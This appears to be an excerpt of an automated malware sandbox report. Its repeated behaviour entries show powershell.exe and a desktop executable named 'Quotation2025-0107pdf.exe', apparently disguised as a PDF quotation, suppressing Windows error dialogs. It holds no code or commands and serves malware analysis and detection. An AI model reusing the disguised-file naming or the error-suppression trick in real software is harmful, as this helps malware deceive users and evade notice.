                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
